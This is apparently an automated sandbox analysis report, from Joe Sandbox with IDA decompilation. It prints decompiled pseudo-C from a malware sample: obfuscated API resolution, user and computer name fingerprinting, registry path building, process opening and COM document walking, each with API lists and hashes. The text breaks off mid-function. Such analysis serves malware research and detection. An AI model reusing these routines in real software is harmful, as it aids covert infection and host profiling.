                • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                • String ID:
                • API String ID: 3369646462-0
                • Opcode ID: debd7ba65b1db748c619e6b1f709a91124f7b4e3fe99714b102989f4a0f9fc6f
                • Instruction ID: ea3cff978b3f239f2604274f4515e7f36ec8fd934fb18231ed8c0af37f9bbaa3
                • Opcode Fuzzy Hash: debd7ba65b1db748c619e6b1f709a91124f7b4e3fe99714b102989f4a0f9fc6f
                • Instruction Fuzzy Hash: 6431EDB5D10319FFDB30EFE5D884A9EB7B8AB08304F104969E542A2155D772AB88DF50
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SysAllocString.OLEAUT32(00000000), ref: 02223ABD
                • SysAllocString.OLEAUT32(0070006F), ref: 02223AD1
                • SysAllocString.OLEAUT32(00000000), ref: 02223AE3
                • SysFreeString.OLEAUT32(00000000), ref: 02223B4B
                • SysFreeString.OLEAUT32(00000000), ref: 02223B5A
                • SysFreeString.OLEAUT32(00000000), ref: 02223B65
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: String$AllocFree
                • String ID:
                • API String ID: 344208780-0
                • Opcode ID: 40e808cbf920cf887ec0437d9464e458cce5c4a786dcb7177d34cb9869d4b3bb
                • Instruction ID: 2bf3fb1ea881ab9fca45998d8607508b7f924519f8e4f775fbd92509d4d39193
                • Opcode Fuzzy Hash: 40e808cbf920cf887ec0437d9464e458cce5c4a786dcb7177d34cb9869d4b3bb
                • Instruction Fuzzy Hash: 22416E36D10619BBDB01EFFCD844A9EB7BAEF49310F144466EA10EB110DB76DA09CB91
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E02226BF9(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                				intOrPtr _v8;
                				intOrPtr _t23;
                				intOrPtr _t26;
                				_Unknown_base(*)()* _t28;
                				intOrPtr _t30;
                				_Unknown_base(*)()* _t32;
                				intOrPtr _t33;
                				_Unknown_base(*)()* _t35;
                				intOrPtr _t36;
                				_Unknown_base(*)()* _t38;
                				intOrPtr _t39;
                				_Unknown_base(*)()* _t41;
                				intOrPtr _t44;
                				struct HINSTANCE__* _t48;
                				intOrPtr _t54;
                
                				_t54 = E022233DC(0x20);
                				if(_t54 == 0) {
                					_v8 = 8;
                				} else {
                					_t23 =  *0x222a348; // 0x9ad5a8
                					_t1 = _t23 + 0x222b436; // 0x4c44544e
                					_t48 = GetModuleHandleA(_t1);
                					_t26 =  *0x222a348; // 0x9ad5a8
                					_t2 = _t26 + 0x222b85c; // 0x7243775a
                					_v8 = 0x7f;
                					_t28 = GetProcAddress(_t48, _t2);
                					 *(_t54 + 0xc) = _t28;
                					if(_t28 == 0) {
                						L8:
                						E022261DA(_t54);
                					} else {
                						_t30 =  *0x222a348; // 0x9ad5a8
                						_t5 = _t30 + 0x222b849; // 0x614d775a
                						_t32 = GetProcAddress(_t48, _t5);
                						 *(_t54 + 0x10) = _t32;
                						if(_t32 == 0) {
                							goto L8;
                						} else {
                							_t33 =  *0x222a348; // 0x9ad5a8
                							_t7 = _t33 + 0x222b72b; // 0x6e55775a
                							_t35 = GetProcAddress(_t48, _t7);
                							 *(_t54 + 0x14) = _t35;
                							if(_t35 == 0) {
                								goto L8;
                							} else {
                								_t36 =  *0x222a348; // 0x9ad5a8
                								_t9 = _t36 + 0x222b883; // 0x4e6c7452
                								_t38 = GetProcAddress(_t48, _t9);
                								 *(_t54 + 0x18) = _t38;
                								if(_t38 == 0) {
                									goto L8;
                								} else {
                									_t39 =  *0x222a348; // 0x9ad5a8
                									_t11 = _t39 + 0x222b87b; // 0x6c43775a
                									_t41 = GetProcAddress(_t48, _t11);
                									 *(_t54 + 0x1c) = _t41;
                									if(_t41 == 0) {
                										goto L8;
                									} else {
                										 *((intOrPtr*)(_t54 + 4)) = _a4;
                										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                										_t44 = E02227A08(_t54, _a8);
                										_v8 = _t44;
                										if(_t44 != 0) {
                											goto L8;
                										} else {
                											 *_a12 = _t54;
                										}
                									}
                								}
                							}
                						}
                					}
                				}
                				return _v8;
                			}



















                APIs
                  • Part of subcall function 022233DC: RtlAllocateHeap.NTDLL(00000000,00000000,022262F6), ref: 022233E8
                • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,022237FB,?,?,?,?,00000000,00000000), ref: 02226C1E
                • GetProcAddress.KERNEL32(00000000,7243775A), ref: 02226C40
                • GetProcAddress.KERNEL32(00000000,614D775A), ref: 02226C56
                • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02226C6C
                • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02226C82
                • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02226C98
                  • Part of subcall function 02227A08: memset.NTDLL ref: 02227A87
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: AddressProc$AllocateHandleHeapModulememset
                • String ID:
                • API String ID: 1886625739-0
                • Opcode ID: 0915e8e43fa11d0ed031d6a3a6ff2ce834a82c91214ecb319b23584e7e3b65b8
                • Instruction ID: 2ecd8999ba2bac004dc67d4c2a8451a075e6d9a9a075e6e49d2d0010a75b9ad9
                • Opcode Fuzzy Hash: 0915e8e43fa11d0ed031d6a3a6ff2ce834a82c91214ecb319b23584e7e3b65b8
                • Instruction Fuzzy Hash: 65212DB151071ABFD720EFEADA48E6AB7ECEB043047125815E505CB321E776EA0C8B60
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 88%
                			E02224C94(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                				signed int _v8;
                				char _v12;
                				signed int* _v16;
                				char _v284;
                				void* __esi;
                				char* _t59;
                				intOrPtr* _t60;
                				intOrPtr _t64;
                				char _t65;
                				intOrPtr _t68;
                				intOrPtr _t69;
                				intOrPtr _t71;
                				void* _t73;
                				signed int _t81;
                				void* _t91;
                				void* _t92;
                				char _t98;
                				signed int* _t100;
                				intOrPtr* _t101;
                				void* _t102;
                
                				_t92 = __ecx;
                				_v8 = _v8 & 0x00000000;
                				_t98 = _a16;
                				if(_t98 == 0) {
                					__imp__( &_v284,  *0x222a3dc);
                					_t91 = 0x80000002;
                					L6:
                					_t59 = E02226536( &_v284,  &_v284);
                					_a8 = _t59;
                					if(_t59 == 0) {
                						_v8 = 8;
                						L29:
                						_t60 = _a20;
                						if(_t60 != 0) {
                							 *_t60 =  *_t60 + 1;
                						}
                						return _v8;
                					}
                					_t101 = _a24;
                					if(E0222313F(_t92, _t97, _t101, _t91, _t59) != 0) {
                						L27:
                						E022261DA(_a8);
                						goto L29;
                					}
                					_t64 =  *0x222a318; // 0x2bd9e18
                					_t16 = _t64 + 0xc; // 0x2bd9f3a
                					_t65 = E02226536(_t64,  *_t16);
                					_a24 = _t65;
                					if(_t65 == 0) {
                						L14:
                						_t29 = _t101 + 0x14; // 0x102
                						_t33 = _t101 + 0x10; // 0x3d022290
                						if(E02227767(_t97,  *_t33, _t91, _a8,  *0x222a3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
                							_t68 =  *0x222a348; // 0x9ad5a8
                							if(_t98 == 0) {
                								_t35 = _t68 + 0x222bb5a; // 0x4d4c4b48
                								_t69 = _t35;
                							} else {
                								_t34 = _t68 + 0x222bbac; // 0x55434b48
                								_t69 = _t34;
                							}
                							if(E02227238(_t69,  *0x222a3d4,  *0x222a3d8,  &_a24,  &_a16) == 0) {
                								if(_t98 == 0) {
                									_t71 =  *0x222a348; // 0x9ad5a8
                									_t44 = _t71 + 0x222b332; // 0x74666f53
                									_t73 = E02226536(_t44, _t44);
                									_t99 = _t73;
                									if(_t73 == 0) {
                										_v8 = 8;
                									} else {
                										_t47 = _t101 + 0x10; // 0x3d022290
                										E02225B0E( *_t47, _t91, _a8,  *0x222a3d8, _a24);
                										_t49 = _t101 + 0x10; // 0x3d022290
                										E02225B0E( *_t49, _t91, _t99,  *0x222a3d0, _a16);
                										E022261DA(_t99);
                									}
                								} else {
                									_t40 = _t101 + 0x10; // 0x3d022290
                									E02225B0E( *_t40, _t91, _a8,  *0x222a3d8, _a24);
                									_t43 = _t101 + 0x10; // 0x3d022290
                									E02225B0E( *_t43, _t91, _a8,  *0x222a3d0, _a16);
                								}
                								if( *_t101 != 0) {
                									E022261DA(_a24);
                								} else {
                									 *_t101 = _a16;
                								}
                							}
                						}
                						goto L27;
                					}
                					_t21 = _t101 + 0x10; // 0x3d022290
                					_t81 = E022258BD( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
                					if(_t81 == 0) {
                						_t100 = _v16;
                						if(_v12 == 0x28) {
                							 *_t100 =  *_t100 & _t81;
                							_t26 = _t101 + 0x10; // 0x3d022290
                							E02227767(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                						}
                						E022261DA(_t100);
                						_t98 = _a16;
                					}
                					E022261DA(_a24);
                					goto L14;
                				}
                				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                					goto L29;
                				} else {
                					_t97 = _a8;
                					E02227AB0(_t98, _a8,  &_v284);
                					__imp__(_t102 + _t98 - 0x117,  *0x222a3dc);
                					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
                					_t91 = 0x80000003;
                					goto L6;
                				}
                			}
























                APIs
                • StrChrA.SHLWAPI(02226A76,0000005F,00000000,00000000,00000104), ref: 02224CC7
                • lstrcpy.KERNEL32(?,?), ref: 02224CF4
                  • Part of subcall function 02226536: lstrlen.KERNEL32(?,00000000,02BD9E18,00000000,02226F0A,02BDA03B,43175AC3,?,?,?,?,43175AC3,00000005,0222A00C,4D283A53,?), ref: 0222653D
                  • Part of subcall function 02226536: mbstowcs.NTDLL ref: 02226566
                  • Part of subcall function 02226536: memset.NTDLL ref: 02226578
                  • Part of subcall function 02225B0E: lstrlenW.KERNEL32(?,?,?,02224E5D,3D022290,80000002,02226A76,022257D1,74666F53,4D4C4B48,022257D1,?,3D022290,80000002,02226A76,?), ref: 02225B33
                  • Part of subcall function 022261DA: RtlFreeHeap.NTDLL(00000000,00000000,02226383,00000000,?,00000000,00000000), ref: 022261E6
                • lstrcpy.KERNEL32(?,00000000), ref: 02224D16
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                • String ID: ($\
                • API String ID: 3924217599-1512714803
                • Opcode ID: cb7257c5c2ee6b464c7ff976bd07cc6180b8ba1221a7710c28486c18448d85b6
                • Instruction ID: 49f37cb00b3bb4aaffb558457ae94778f2abd41b6e78aa21071ebf214b24bc5c
                • Opcode Fuzzy Hash: cb7257c5c2ee6b464c7ff976bd07cc6180b8ba1221a7710c28486c18448d85b6
                • Instruction Fuzzy Hash: 6551377252022AFBDF21AFE0DD44EAA77BAEF04314F008514F91196168D777E929DB10
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E02221340() {
                				long _v8;
                				long _v12;
                				int _v16;
                				long _t39;
                				long _t43;
                				signed int _t47;
                				short _t51;
                				signed int _t52;
                				int _t56;
                				int _t57;
                				char* _t64;
                				short* _t67;
                
                				_v16 = 0;
                				_v8 = 0;
                				GetUserNameW(0,  &_v8);
                				_t39 = _v8;
                				if(_t39 != 0) {
                					_v12 = _t39;
                					_v8 = 0;
                					GetComputerNameW(0,  &_v8);
                					_t43 = _v8;
                					if(_t43 != 0) {
                						_t11 = _t43 + 2; // 0x7491c742
                						_v12 = _v12 + _t11;
                						_t64 = E022233DC(_v12 + _t11 << 2);
                						if(_t64 != 0) {
                							_t47 = _v12;
                							_t67 = _t64 + _t47 * 2;
                							_v8 = _t47;
                							if(GetUserNameW(_t67,  &_v8) == 0) {
                								L7:
                								E022261DA(_t64);
                							} else {
                								_t51 = 0x40;
                								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
                								_t52 = _v8;
                								_v12 = _v12 - _t52;
                								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
                									goto L7;
                								} else {
                									_t56 = _v12 + _v8;
                									_t31 = _t56 + 2; // 0x2223e01
                									_v12 = _t56;
                									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
                									_v8 = _t57;
                									if(_t57 == 0) {
                										goto L7;
                									} else {
                										_t64[_t57] = 0;
                										_v16 = _t64;
                									}
                								}
                							}
                						}
                					}
                				}
                				return _v16;
                			}
















                APIs
                • GetUserNameW.ADVAPI32(00000000,02223DFF), ref: 02221354
                • GetComputerNameW.KERNEL32(00000000,02223DFF), ref: 02221370
                  • Part of subcall function 022233DC: RtlAllocateHeap.NTDLL(00000000,00000000,022262F6), ref: 022233E8
                • GetUserNameW.ADVAPI32(00000000,02223DFF), ref: 022213AA
                • GetComputerNameW.KERNEL32(02223DFF,7491C740), ref: 022213CD
                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,02223DFF,00000000,02223E01,00000000,00000000,?,7491C740,02223DFF), ref: 022213F0
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                • String ID:
                • API String ID: 3850880919-0
                • Opcode ID: 731e562ee99054275b316fb3108dc7f6fab1212f959898f9266093b7df1ffd62
                • Instruction ID: 384ada8f7e5085258cf4ecce4825d279e7c6c23ba42c2b5b031916ed0501f433
                • Opcode Fuzzy Hash: 731e562ee99054275b316fb3108dc7f6fab1212f959898f9266093b7df1ffd62
                • Instruction Fuzzy Hash: A7214976D00219FFCB10DFE5D988DEEBBB8EF44204B1144AAE509E7241DB319B59CB10
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,0050167F,0000000A,?,?), ref: 00501824
                • CreateFileMappingW.KERNEL32(000000FF,00404188,00000004,00000000,?,?,?,?,54D38000,00000192), ref: 00501884
                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,0050167F,0000000A), ref: 005018AF
                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0050167F,0000000A,?,?), ref: 005018D0
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0050167F,0000000A,?,?), ref: 005018D8
                Memory Dump Source
                • Source File: 00000000.00000002.517428823.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_500000_server.jbxd
                Yara matches
                Similarity
                • API ID: File$Time$CloseCreateErrorHandleLastMappingSystemView
                • String ID:
                • API String ID: 2685682793-0
                • Opcode ID: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
                • Instruction ID: 64db3c3de8f29a4286d5d635259dde8e1d908afb260b01bc5e3353c911d25b46
                • Opcode Fuzzy Hash: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
                • Instruction Fuzzy Hash: 7E2195B2A00509BFD710AFA4DC88EAE7FADFF44395F108435FA05E71D0D6709A448B69
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E022254D8(intOrPtr _a4) {
                				void* _t2;
                				unsigned int _t4;
                				void* _t5;
                				long _t6;
                				void* _t7;
                				void* _t15;
                
                				_t2 = CreateEventA(0, 1, 0, 0);
                				 *0x222a30c = _t2;
                				if(_t2 == 0) {
                					return GetLastError();
                				}
                				_t4 = GetVersion();
                				if(_t4 != 5) {
                					L4:
                					if(_t15 <= 0) {
                						_t5 = 0x32;
                						return _t5;
                					}
                					L5:
                					 *0x222a2fc = _t4;
                					_t6 = GetCurrentProcessId();
                					 *0x222a2f8 = _t6;
                					 *0x222a304 = _a4;
                					_t7 = OpenProcess(0x10047a, 0, _t6);
                					 *0x222a2f4 = _t7;
                					if(_t7 == 0) {
                						 *0x222a2f4 =  *0x222a2f4 | 0xffffffff;
                					}
                					return 0;
                				}
                				if(_t4 >> 8 > 0) {
                					goto L5;
                				}
                				_t15 = _t4 - _t4;
                				goto L4;
                			}










                APIs
                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,02225037,?), ref: 022254E0
                • GetVersion.KERNEL32 ref: 022254EF
                • GetCurrentProcessId.KERNEL32 ref: 0222550B
                • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 02225528
                • GetLastError.KERNEL32 ref: 02225547
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                • String ID:
                • API String ID: 2270775618-0
                • Opcode ID: b8e1388054559f0e2707945208aaf05d2391c11c8426ae9d4c00ea0dfcd2fd54
                • Instruction ID: f496384c4344bec5d8f2f3bd34d29e8ae98addb277f5afef77faf4a754bd1eaa
                • Opcode Fuzzy Hash: b8e1388054559f0e2707945208aaf05d2391c11c8426ae9d4c00ea0dfcd2fd54
                • Instruction Fuzzy Hash: 8AF06DB0DA0312BBD7384FE0B91EB143BA6A704751F629914E516DA1C4EBB381BCCB15
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 00502052
                • GetModuleHandleA.KERNEL32(00000000), ref: 00502062
                • GetCommandLineW.KERNEL32 ref: 0050206D
                  • Part of subcall function 00501C58: NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 00501C8D
                  • Part of subcall function 00501C58: Sleep.KERNEL32(00000000,00000030), ref: 00501CD4
                  • Part of subcall function 00501C58: GetLocaleInfoA.KERNEL32(00000400,0000005A,?,00000004), ref: 00501CFC
                  • Part of subcall function 00501C58: GetSystemDefaultUILanguage.KERNEL32 ref: 00501D06
                  • Part of subcall function 00501C58: VerLanguageNameA.KERNEL32(?,?,00000004), ref: 00501D19
                • HeapDestroy.KERNEL32 ref: 00502080
                • ExitProcess.KERNEL32 ref: 00502087
                Memory Dump Source
                • Source File: 00000000.00000002.517428823.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_500000_server.jbxd
                Yara matches
                Similarity
                • API ID: HeapLanguageSystem$CommandCreateDefaultDestroyExitHandleInfoInformationLineLocaleModuleNameProcessQuerySleep
                • String ID:
                • API String ID: 1393419808-0
                • Opcode ID: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
                • Instruction ID: bf055d56dd076ffde3d587b6f515220016ebadc5894100461a91dbe29ac05199
                • Opcode Fuzzy Hash: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
                • Instruction Fuzzy Hash: 4FE0B6B0803620ABC3216F71BE0CA4E7E2CBB59B527000535F605F2165CB388A81CA9D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 46%
                			E02226CDF(intOrPtr* __eax) {
                				void* _v8;
                				WCHAR* _v12;
                				void* _v16;
                				char _v20;
                				void* _v24;
                				intOrPtr _v28;
                				void* _v32;
                				intOrPtr _v40;
                				short _v48;
                				intOrPtr _v56;
                				short _v64;
                				intOrPtr* _t54;
                				intOrPtr* _t56;
                				intOrPtr _t57;
                				intOrPtr* _t58;
                				intOrPtr* _t60;
                				void* _t61;
                				intOrPtr* _t63;
                				intOrPtr* _t65;
                				short _t67;
                				intOrPtr* _t68;
                				intOrPtr* _t70;
                				intOrPtr* _t72;
                				intOrPtr* _t75;
                				intOrPtr* _t77;
                				intOrPtr _t79;
                				intOrPtr* _t83;
                				intOrPtr* _t87;
                				intOrPtr _t103;
                				intOrPtr _t109;
                				void* _t118;
                				void* _t122;
                				void* _t123;
                				intOrPtr _t130;
                
                				_t123 = _t122 - 0x3c;
                				_push( &_v8);
                				_push(__eax);
                				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
                				if(_t118 >= 0) {
                					_t54 = _v8;
                					_t103 =  *0x222a348; // 0x9ad5a8
                					_t5 = _t103 + 0x222b038; // 0x3050f485
                					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                					_t56 = _v8;
                					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                					if(_t118 >= 0) {
                						__imp__#2(0x2229284);
                						_v28 = _t57;
                						if(_t57 == 0) {
                							_t118 = 0x8007000e;
                						} else {
                							_t60 = _v32;
                							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                							_t87 = __imp__#6;
                							_t118 = _t61;
                							if(_t118 >= 0) {
                								_t63 = _v24;
                								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                								if(_t118 >= 0) {
                									_t130 = _v20;
                									if(_t130 != 0) {
                										_t67 = 3;
                										_v64 = _t67;
                										_v48 = _t67;
                										_v56 = 0;
                										_v40 = 0;
                										if(_t130 > 0) {
                											while(1) {
                												_t68 = _v24;
                												asm("movsd");
                												asm("movsd");
                												asm("movsd");
                												asm("movsd");
                												_t123 = _t123;
                												asm("movsd");
                												asm("movsd");
                												asm("movsd");
                												asm("movsd");
                												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
                												if(_t118 < 0) {
                													goto L16;
                												}
                												_t70 = _v8;
                												_t109 =  *0x222a348; // 0x9ad5a8
                												_t28 = _t109 + 0x222b0e4; // 0x3050f1ff
                												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
                												if(_t118 >= 0) {
                													_t75 = _v16;
                													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
                													if(_t118 >= 0 && _v12 != 0) {
                														_t79 =  *0x222a348; // 0x9ad5a8
                														_t33 = _t79 + 0x222b078; // 0x76006f
                														if(lstrcmpW(_v12, _t33) == 0) {
                															_t83 = _v16;
                															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
                														}
                														 *_t87(_v12);
                													}
                													_t77 = _v16;
                													 *((intOrPtr*)( *_t77 + 8))(_t77);
                												}
                												_t72 = _v8;
                												 *((intOrPtr*)( *_t72 + 8))(_t72);
                												_v40 = _v40 + 1;
                												if(_v40 < _v20) {
                													continue;
                												}
                												goto L16;
                											}
                										}
                									}
                								}
                								L16:
                								_t65 = _v24;
                								 *((intOrPtr*)( *_t65 + 8))(_t65);
                							}
                							 *_t87(_v28);
                						}
                						_t58 = _v32;
                						 *((intOrPtr*)( *_t58 + 8))(_t58);
                					}
                				}
                				return _t118;
                			}


                APIs
                • SysAllocString.OLEAUT32(02229284), ref: 02226D2F
                • lstrcmpW.KERNEL32(00000000,0076006F), ref: 02226E10
                • SysFreeString.OLEAUT32(00000000), ref: 02226E29
                • SysFreeString.OLEAUT32(?), ref: 02226E58
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: String$Free$Alloclstrcmp
                • String ID:
                • API String ID: 1885612795-0
                • Opcode ID: ab30162b212d3823ddacb2a348483d451588fc2867ee0db0349798e086926cba
                • Instruction ID: 5a1c3a96f78888cec18df29de26c6a822574451de74b136c5e865300b4082599
                • Opcode Fuzzy Hash: ab30162b212d3823ddacb2a348483d451588fc2867ee0db0349798e086926cba
                • Instruction Fuzzy Hash: FC516D76D00619EFCB11DFE8C488DAEB7BAFF88704B154584E915EB214D732AE45CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SysAllocString.OLEAUT32(?), ref: 022259B8
                • SysFreeString.OLEAUT32(00000000), ref: 02225A9D
                  • Part of subcall function 02226CDF: SysAllocString.OLEAUT32(02229284), ref: 02226D2F
                • SafeArrayDestroy.OLEAUT32(00000000), ref: 02225AF0
                • SysFreeString.OLEAUT32(00000000), ref: 02225AFF
                  • Part of subcall function 022277E3: Sleep.KERNEL32(000001F4), ref: 0222782B
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: String$AllocFree$ArrayDestroySafeSleep
                • String ID:
                • API String ID: 3193056040-0
                • Opcode ID: 1fb14339688b98707f6b5a79e32c205510ca09a5ad8263037a30b0d2934d21f5
                • Instruction ID: 2f929b2f0608cfe66985d5771c97f6885b0f288e20662d3bdd05236d5e87b297
                • Opcode Fuzzy Hash: 1fb14339688b98707f6b5a79e32c205510ca09a5ad8263037a30b0d2934d21f5
                • Instruction Fuzzy Hash: 11519E35910619BFCB11CFE8C884A9EB7B6FF88704F258828E505DB214DB36ED19CB50
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 85%
                			E02224781(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                				intOrPtr _v8;
                				intOrPtr _v12;
                				signed int _v16;
                				void _v156;
                				void _v428;
                				void* _t55;
                				unsigned int _t56;
                				signed int _t66;
                				signed int _t74;
                				void* _t76;
                				signed int _t79;
                				void* _t81;
                				void* _t92;
                				void* _t96;
                				signed int* _t99;
                				signed int _t101;
                				signed int _t103;
                				void* _t107;
                
                				_t92 = _a12;
                				_t101 = __eax;
                				_t55 = E022261EF(_a16, _t92);
                				_t79 = _t55;
                				if(_t79 == 0) {
                					L18:
                					return _t55;
                				}
                				_t56 =  *(_t92 + _t79 * 4 - 4);
                				_t81 = 0;
                				_t96 = 0x20;
                				if(_t56 == 0) {
                					L4:
                					_t97 = _t96 - _t81;
                					_v12 = _t96 - _t81;
                					E02226725(_t79,  &_v428);
                					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E02227477(_t101,  &_v428, _a8, _t96 - _t81);
                					E02227477(_t79,  &_v156, _a12, _t97);
